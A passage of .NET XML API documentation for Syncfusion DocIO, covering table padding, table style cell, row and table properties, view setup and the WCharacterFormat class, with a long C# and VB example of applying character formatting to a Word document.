        <member name="F:Syncfusion.DocIO.DLS.Paddings.BottomKey">
            <summary>
            Specifies the constant value for bottom key.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Paddings.RightKey">
            <summary>
            Specifies the constant value for right key.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Paddings.#ctor(Syncfusion.DocIO.DLS.FormatBase,System.Int32)">
            <summary>
            
            </summary>
            <param name="parent"></param>
            <param name="baseKey"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Paddings.#ctor">
            <summary>
            Initializes a new instance of the Paddings class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Paddings.UpdatePaddings(Syncfusion.DocIO.DLS.Paddings)">
            <summary>
            Updates the paddings.
            </summary>
            <param name="padding">The padding.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Paddings.GetDefValue(System.Int32)">
            <summary>
            Returns the default values.
            <exclude/>
            </summary>
            <param name="key">The <b>integer</b> that specifies the key.</param>
            <returns>An object that specifies the default value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Paddings.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Paddings.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Paddings.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Paddings.OnChange(Syncfusion.DocIO.DLS.FormatBase,System.Int32)">
            <summary>
            Occurs on format change.
            <exclude/>
            </summary>
            <param name="format">The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> object.</param>
            <param name="propertyKey">The <b>integer</b> that represents the property key.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Paddings.Left">
            <summary>
            Gets or sets the left padding value for the cell in points.
            </summary>
            <value>The <b>float </b> that specifies left padding value.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Paddings.Top">
            <summary>
            Gets or sets the top padding value for the cell in points.
            </summary>
            <value>The <b>float </b> that specifies top padding value.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Paddings.Right">
            <summary>
            Gets or sets the right padding value for the cell in points.
            </summary>
            <value>The <b>float </b> that specifies right padding value.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Paddings.Bottom">
            <summary>
            Gets or sets the bottom padding value for the cell in points.
            </summary>
            <value>The <b>float </b> that specifies bottom padding value.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Paddings.All">
            <summary>
            Sets the padding values for all sides of the cell.
            </summary>
            <value>The <b>float </b> that specifies the padding value for left, right, top and bottom.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TableStyleCellProperties">
            <summary>
            TableStyleCellProperties is used for representing formatting properties of the table. 
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableStyleCellProperties.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the TableStyleCellProperties class.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableStyleCellProperties.GetPropertyValue(System.Int32)">
            <summary>
            Gets the property value.
            </summary>
            <param name="propertyKey">The property key.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableStyleCellProperties.SetPropertyValue(System.Int32,System.Object)">
            <summary>
            Sets the property value.
            </summary>
            <param name="propertyKey">The property key.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableStyleCellProperties.UpdateCellProperties(System.Int32)">
            <summary>
            Updates the cell properties.
            </summary>
            <param name="propertyKey">The property key.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableStyleCellProperties.HasValue(System.Int32)">
            <summary>
            Determines whether the specified property key has value.
            </summary>
            <param name="propertyKey">The property key.</param>
            <returns>
            	if the specified property key has value, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableStyleCellProperties.ApplyBase(Syncfusion.DocIO.DLS.FormatBase)">
            <summary>
            Apply base style
            </summary>
            <param name="baseFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableStyleCellProperties.EnsureComposites">
            <summary>
            Ensures the composites.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableStyleCellProperties.GetDefValue(System.Int32)">
            <summary>
            Returns the default values.
            </summary>
            <param name="key">The <b>integer</b> that specifies the key.</param>
            <returns>An object that specifies the default value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableStyleCellProperties.GetDefComposite(System.Int32)">
            <summary>
            Gets the composite values.
            </summary>
            <param name="key">The <b>integer</b> that specifies the key.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> object.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableStyleCellProperties.BackColor">
            <summary>
            Gets/sets the background color.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableStyleCellProperties.ForeColor">
            <summary>
            Gets/sets the foreground color.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableStyleCellProperties.TextureStyle">
            <summary>
            Gets or sets the texture style.
            </summary>
            <value>The texture style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableStyleCellProperties.Borders">
            <summary>
            Gets the borders.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableStyleCellProperties.Paddings">
            <summary>
            Gets the paddings.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableStyleCellProperties.VerticalAlignment">
            <summary>
            Gets/sets vertical alignment of the cell.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableStyleCellProperties.TextWrap">
            <summary>
            Gets or sets a boolean value indicating whether to wrap text in cell or not.
            </summary>
            <value><c>true</c> if it specifies text wrap, set to <c>true</c>.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TableStyleRowProperties">
            <summary>
            TableStyleRowProperties is used for representing formatting properties of the table. 
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableStyleRowProperties.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the TableStyleRowProperties class.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableStyleRowProperties.GetAsRowFormat">
            <summary>
            Gets as row format.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableStyleRowProperties.GetPropertyValue(System.Int32)">
            <summary>
            Gets the property value.
            </summary>
            <param name="propertyKey">The property key.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableStyleRowProperties.SetPropertyValue(System.Int32,System.Object)">
            <summary>
            Sets the property value.
            </summary>
            <param name="propertyKey">The property key.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableStyleRowProperties.UpdateRowProperties(System.Int32)">
            <summary>
            Updates the row properties.
            </summary>
            <param name="propertyKey">The property key.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableStyleRowProperties.HasValue(System.Int32)">
            <summary>
            Determines whether the specified property key has value.
            </summary>
            <param name="propertyKey">The property key.</param>
            <returns>
            	if the specified property key has value, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableStyleRowProperties.GetDefValue(System.Int32)">
            <summary>
            Returns the default values.
            </summary>
            <param name="key">The <b>integer</b> that specifies the key.</param>
            <returns>An object that specifies the default value.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableStyleRowProperties.IsHidden">
            <summary>
            Gets / sets a boolean value indicating if row is hidden
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableStyleRowProperties.IsHeader">
            <summary>
            Gets / sets a boolean value indicating if row is table header
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableStyleRowProperties.IsBreakAcrossPages">
            <summary>
            Gets / sets a boolean value indicating if there is a break across pages
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableStyleRowProperties.CellSpacing">
            <summary>
            Gets / sets the spacing between cells.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableStyleRowProperties.HorizontalAlignment">
            <summary>
            Gets / sets horizontal alignment of the row. 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TableStyleTableProperties">
            <summary>
            TableStyleTableProperties is used for representing formatting properties of the table. 
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableStyleTableProperties.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the TableStyleTableProperties class.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableStyleTableProperties.GetAsTableFormat">
            <summary>
            Gets as table format.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableStyleTableProperties.GetPropertyValue(System.Int32)">
            <summary>
            Gets the property value.
            </summary>
            <param name="propertyKey">The property key.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableStyleTableProperties.SetPropertyValue(System.Int32,System.Object)">
            <summary>
            Sets the property value.
            </summary>
            <param name="propertyKey">The property key.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableStyleTableProperties.UpdateTableProperties(System.Int32)">
            <summary>
            Updates the table properties.
            </summary>
            <param name="propertyKey">The property key.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableStyleTableProperties.HasValue(System.Int32)">
            <summary>
            Determines whether the specified property key has value.
            </summary>
            <param name="propertyKey">The property key.</param>
            <returns>
            	if the specified property key has value, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableStyleTableProperties.ApplyBase(Syncfusion.DocIO.DLS.FormatBase)">
            <summary>
            Apply base style
            </summary>
            <param name="baseFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableStyleTableProperties.EnsureComposites">
            <summary>
            Ensures the composites.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableStyleTableProperties.GetDefValue(System.Int32)">
            <summary>
            Returns the default values.
            </summary>
            <param name="key">The <b>integer</b> that specifies the key.</param>
            <returns>An object that specifies the default value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TableStyleTableProperties.GetDefComposite(System.Int32)">
            <summary>
            Gets the composite values.
            </summary>
            <param name="key">The <b>integer</b> that specifies the key.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> object.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableStyleTableProperties.BackColor">
            <summary>
            Gets/sets the background color.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableStyleTableProperties.ForeColor">
            <summary>
            Gets/sets the foreground color.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableStyleTableProperties.TextureStyle">
            <summary>
            Gets or sets the texture style.
            </summary>
            <value>The texture style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableStyleTableProperties.Borders">
            <summary>
            Gets the borders.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableStyleTableProperties.Paddings">
            <summary>
            Gets the paddings.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableStyleTableProperties.CellSpacing">
            <summary>
            Gets / sets the spacing between cells.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableStyleTableProperties.LeftIndent">
            <summary>
            Gets / sets the table indent.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableStyleTableProperties.AllowPageBreaks">
            <summary>
            Gets / sets the boolean value indicating if table allow page breaks
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableStyleTableProperties.HorizontalAlignment">
            <summary>
            Gets / sets horizontal alignment of the table. 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableStyleTableProperties.ColumnStripe">
            <summary>
            Gets / sets number of columns in column band.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TableStyleTableProperties.RowStripe">
            <summary>
            Gets / sets number of rows in row band.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ViewSetup">
            <summary>
            Represents the view setup options for the Word document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ViewSetup.DEF_ZOOMING">
            <summary>
            Constant value for Zoom.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ViewSetup.m_zoomType">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ViewSetup.m_zoomPercent">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ViewSetup.m_docViewType">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ViewSetup.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.ViewSetup"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ViewSetup.Clone(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Clones the specified doc.
            </summary>
            <param name="doc">The doc.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ViewSetup.SetZoomPercent(System.Int32)">
            <summary>
            Sets the zoom percent.
            Validates the Zoom percentage value while parsing the document.
            </summary>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ViewSetup.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ViewSetup.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ViewSetup.ZoomPercent">
            <summary>
            Gets or sets the zoom value in percents.
            </summary>
            <value>The <b>integer</b> specifying the zoom percent.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ViewSetup.ZoomType">
            <summary>
            Gets or sets the zoom type
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.ZoomType"/> member that specifies the type of the zoom.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ViewSetup.DocumentViewType">
            <summary>
            Gets or sets the document view mode.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DocumentViewType"/> member that specifies the type of the document view.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WCharacterFormat">
            <summary>
            Represents the font or character properties of the text in the Word document. 
            </summary>
            <example>The following examples illustrates how to apply various character formats for the text.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Add new text to the paragraph
                IWTextRange text = paragraph.AppendText("Text with All caps.");
                //All Caps
                text.CharacterFormat.AllCaps = true;
                paragraph = section.AddParagraph();           
                text = paragraph.AppendText("Right to left text.");
                //Right to left text with bold and italic styles.
                text.CharacterFormat.Bidi = true;
                text.CharacterFormat.FontNameBidi = "Times New Roman";
                text.CharacterFormat.FontSizeBidi = 14;
                text.CharacterFormat.BoldBidi = true;
                text.CharacterFormat.ItalicBidi = true;
                paragraph = section.AddParagraph();
                //Bold
                text = paragraph.AppendText("Bold text.");
                text.CharacterFormat.Bold = true;
                paragraph = section.AddParagraph();
                text = paragraph.AppendText("Text with border.");
                //Borders
                text.CharacterFormat.Border.BorderType = BorderStyle.DotDash;
                text.CharacterFormat.Border.LineWidth = 0.5f;
                text.CharacterFormat.Border.Color = Color.Blue;
                paragraph = section.AddParagraph();
                text = paragraph.AppendText("Character spacing.");
                text.CharacterFormat.CharacterSpacing = 1;
                paragraph = section.AddParagraph();
                text = paragraph.AppendText("Double strike.");
                //Double strike
                text.CharacterFormat.DoubleStrike = true;
                paragraph = section.AddParagraph();
                text = paragraph.AppendText("Emboss.");
                //Emboss
                text.CharacterFormat.Emboss = true;
                paragraph = section.AddParagraph();
                text = paragraph.AppendText("Engrave.");
                //Engrave
                text.CharacterFormat.Engrave = true;
                paragraph = section.AddParagraph();
                text = paragraph.AppendText("Font name.");
                //Font name
                text.CharacterFormat.FontName = "Algerian";
                paragraph = section.AddParagraph();
                text = paragraph.AppendText("Font size.");
                //Font size
                text.CharacterFormat.FontSize = 10;
                paragraph = section.AddParagraph();
                text = paragraph.AppendText("Highlight color.");
                //Highlight color
                text.CharacterFormat.HighlightColor = Color.Gray;
                paragraph = section.AddParagraph();
                text = paragraph.AppendText("Italic.");
                //Italic
                text.CharacterFormat.Italic = true;
                paragraph = section.AddParagraph();
                text = paragraph.AppendText("Outline.");
                //Outline
                text.CharacterFormat.OutLine = true;
                paragraph = section.AddParagraph();
                paragraph.AppendText("Position Property with text");
                text = paragraph.AppendText("raised by 10 points.");
                //Position
                text.CharacterFormat.Position = 10;
                paragraph = section.AddParagraph();
                text = paragraph.AppendText("Shadow.");
                //Shadow
                text.CharacterFormat.Shadow = true;
                paragraph = section.AddParagraph();
                text = paragraph.AppendText("SmallCaps.");
                //SmallCaps
                text.CharacterFormat.SmallCaps = true;
                paragraph = section.AddParagraph();
                text = paragraph.AppendText("Strikeout.");
                //Strikeout
                text.CharacterFormat.Strikeout = true;
                paragraph = section.AddParagraph();
                paragraph.AppendText("Text");
                text = paragraph.AppendText("Subscript.");
                //Subscript
                text.CharacterFormat.SubSuperScript = SubSuperScript.SubScript;
                paragraph = section.AddParagraph();
                paragraph.AppendText("Text");
                text = paragraph.AppendText("Superscript.");
                //Superscript
                text.CharacterFormat.SubSuperScript = SubSuperScript.SuperScript;
                paragraph = section.AddParagraph();
                text = paragraph.AppendText("TextBackgroundColor.");
                //TextBackgroundColor
                text.CharacterFormat.TextBackgroundColor = Color.LightSkyBlue;
                paragraph = section.AddParagraph();
                text = paragraph.AppendText("TextColor.");
                //TextColor
                text.CharacterFormat.TextColor = Color.Green;
                paragraph = section.AddParagraph();
                text = paragraph.AppendText("UnderlineStyle.");
                //UnderlineStyle
                text.CharacterFormat.UnderlineStyle = UnderlineStyle.Dash;
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Add new text to the paragraph
                Dim text As IWTextRange = paragraph.AppendText("Text with All caps.")
                'All Caps
                text.CharacterFormat.AllCaps = True
                paragraph = section.AddParagraph()
                text = paragraph.AppendText("Right to left text.")
                'Right to left text with bold and italic styles.
                text.CharacterFormat.Bidi = True
                text.CharacterFormat.FontNameBidi = "Times New Roman"
                text.CharacterFormat.FontSizeBidi = 14
                text.CharacterFormat.BoldBidi = True
                text.CharacterFormat.ItalicBidi = True
                paragraph = section.AddParagraph()
                'Bold
                text = paragraph.AppendText("Bold text.")
                text.CharacterFormat.Bold = True
                paragraph = section.AddParagraph()
                text = paragraph.AppendText("Text with border.")
                'Borders
                text.CharacterFormat.Border.BorderType = BorderStyle.DotDash
                text.CharacterFormat.Border.LineWidth = 0.5F
                text.CharacterFormat.Border.Color = Color.Blue
                paragraph = section.AddParagraph()
                text = paragraph.AppendText("Character spacing.")
                text.CharacterFormat.CharacterSpacing = 1
                paragraph = section.AddParagraph()
                text = paragraph.AppendText("Double strike.")
                'Double strike
                text.CharacterFormat.DoubleStrike = True
                paragraph = section.AddParagraph()
                text = paragraph.AppendText("Emboss.")
                'Emboss
                text.CharacterFormat.Emboss = True
                paragraph = section.AddParagraph()
                text = paragraph.AppendText("Engrave.")
                'Engrave
                text.CharacterFormat.Engrave = True
                paragraph = section.AddParagraph()
                text = paragraph.AppendText("Font name.")
                'Font name
                text.CharacterFormat.FontName = "Algerian"
                paragraph = section.AddParagraph()
                text = paragraph.AppendText("Font size.")
                'Font size
                text.CharacterFormat.FontSize = 10
                paragraph = section.AddParagraph()
                text = paragraph.AppendText("Highlight color.")
                'Highlight color
                text.CharacterFormat.HighlightColor = Color.Gray
                paragraph = section.AddParagraph()
                text = paragraph.AppendText("Italic.")
                'Italic
                text.CharacterFormat.Italic = True
                paragraph = section.AddParagraph()
                text = paragraph.AppendText("Outline.")
                'Outline
                text.CharacterFormat.OutLine = True
                paragraph = section.AddParagraph()
                paragraph.AppendText("Position Property with text")
                text = paragraph.AppendText("raised by 10 points.")
                'Position
                text.CharacterFormat.Position = 10
                paragraph = section.AddParagraph()
                text = paragraph.AppendText("Shadow.")
                'Shadow
                text.CharacterFormat.Shadow = True
                paragraph = section.AddParagraph()
                text = paragraph.AppendText("SmallCaps.")
                'SmallCaps
                text.CharacterFormat.SmallCaps = True
                paragraph = section.AddParagraph()
                text = paragraph.AppendText("Strikeout.")
                'Strikeout
                text.CharacterFormat.Strikeout = True
                paragraph = section.AddParagraph()
                paragraph.AppendText("Text")
                text = paragraph.AppendText("Subscript.")
                'Subscript
                text.CharacterFormat.SubSuperScript = SubSuperScript.SubScript
                paragraph = section.AddParagraph()
                paragraph.AppendText("Text")
                text = paragraph.AppendText("Superscript.")
                'Superscript
                text.CharacterFormat.SubSuperScript = SubSuperScript.SuperScript
                paragraph = section.AddParagraph()
                text = paragraph.AppendText("TextBackgroundColor.")
                'TextBackgroundColor
                text.CharacterFormat.TextBackgroundColor = Color.LightSkyBlue
                paragraph = section.AddParagraph()
                text = paragraph.AppendText("TextColor.")
                'TextColor
                text.CharacterFormat.TextColor = Color.Green
                paragraph = section.AddParagraph()
                text = paragraph.AppendText("UnderlineStyle.")
                'UnderlineStyle
                text.CharacterFormat.UnderlineStyle = UnderlineStyle.Dash
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WCharacterFormat.DEF_FONTFAMILY">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WCharacterFormat.FontKey">
            <summary>
            Keys.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WCharacterFormat.m_charStyleName">
            <summary>
            Member that specifies the character style name.
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WCharacterFormat.m_newCharStyleName">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WCharacterFormat.m_tableStyleCharacterFormat">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WCharacterFormat.m_charProps">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WCharacterFormat.m_xmlProps">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.#ctor">
            <summary>
            Default constructor
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WCharacterFormat"/> class with the specified
            <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance. 
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.#ctor(Syncfusion.DocIO.DLS.IWordDocument,Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WCharacterFormat">WCharacterFormat</see> class. 
            </summary>
            <param name="doc"></param>
            <param name="owner"></param>
            <remarks></remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.RemoveFontNames">
            <summary>
            Removes the initialized font names.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.IsLineBreakNext">
            <summary>
            Determines whether line break is next to this paragraph item.
            </summary>
            <returns>
            	if it specifies next element is line break, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.SetLineBreakNext">
            <summary>
            Sets the line break next.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.CheckCharProps">
            <summary>
            Checks the character properties object.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.GetPropertyValue(System.Int32)">
            <summary>
            Gets the property value.
            </summary>
            <param name="propKey">The prop key.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.GetBoolPropertyValue(System.Int16)">
            <summary>
            Gets the boolean property value.
            </summary>
            <param name="propKey">The prop key.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.ContainsSprm(System.Int16)">
            <summary>
            Determines whether the specified option key contains SPRM.
            </summary>
            <param name="optionKey">The option key.</param>
            <returns>
            	<c>true</c> if the specified option key contains SPRM; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.SetPropertyValue(System.Int32,System.Object)">
            <summary>
            Sets the property value.
            </summary>
            <param name="propKey">The property key.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.UpdateCharProps(System.Int32,System.Object)">
            <summary>
            Updates the character properties.
            </summary>
            <param name="propertyKey">The property key.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.UpdateCharFormat(System.Int32)">
            <summary>
            Updates character format options.
            </summary>
            <param name="propertyKey">The property key.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.UpdateCharacterFormat(System.Int32)">
            <summary>
            Updates character format options.
            </summary>
            <param name="propertyKey">The property key.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.UpdateChangedFormat">
            <summary>
            Updates the changed format.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.IsBooleanProperty(System.Int32)">
            <summary>
            Determines whether the specified key is boolean property.
            </summary>
            <param name="key">The key.</param>
            <returns>
            	<c>true</c> if the specified key is boolean property; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.SetFontNames(Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties)">
            <summary>
            Sets the font names for character format.
            </summary>
            <param name="charProps">The character props.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.SetComplexScript(Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties)">
            <summary>
            Set the complex script value
            </summary>
            <param name="charProps"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.SetLanguages(Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties)">
            <summary>
            Set the language sprms
            </summary>
            <param name="charProps"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.SetLanguageId(System.Int32,System.Int16,Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties)">
            <summary>
            Set the language sprms
            </summary>
            <param name="sprmOptions"></param>
            <param name="Key"></param>
            <param name="charProps"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.SetFontName(System.Int32,System.Int32,Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties)">
            <summary>
            Updates the name of the font.
            </summary>
            <param name="option">The option.</param>
            <param name="fontKey">The font key.</param>
            <param name="charProps">The character props.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.SetCharPropFontNames(Syncfusion.DocIO.ReaderWriter.WordStyleSheet)">
            <summary>
            Sets character properties' font names.
            </summary>
            <param name="styleSheet">The stylesheet.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.SetCharPropFontName(System.Int32,Syncfusion.DocIO.ReaderWriter.WordStyleSheet)">
            <summary>
            Sets character properties' font name.
            </summary>
            <param name="fontKey">The font key.</param>
            <param name="styleSheet">The stylesheet.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterFormat.CharPropsHasSprms">
            <summary>
            Chars the props has SPRMS.
            </summary>
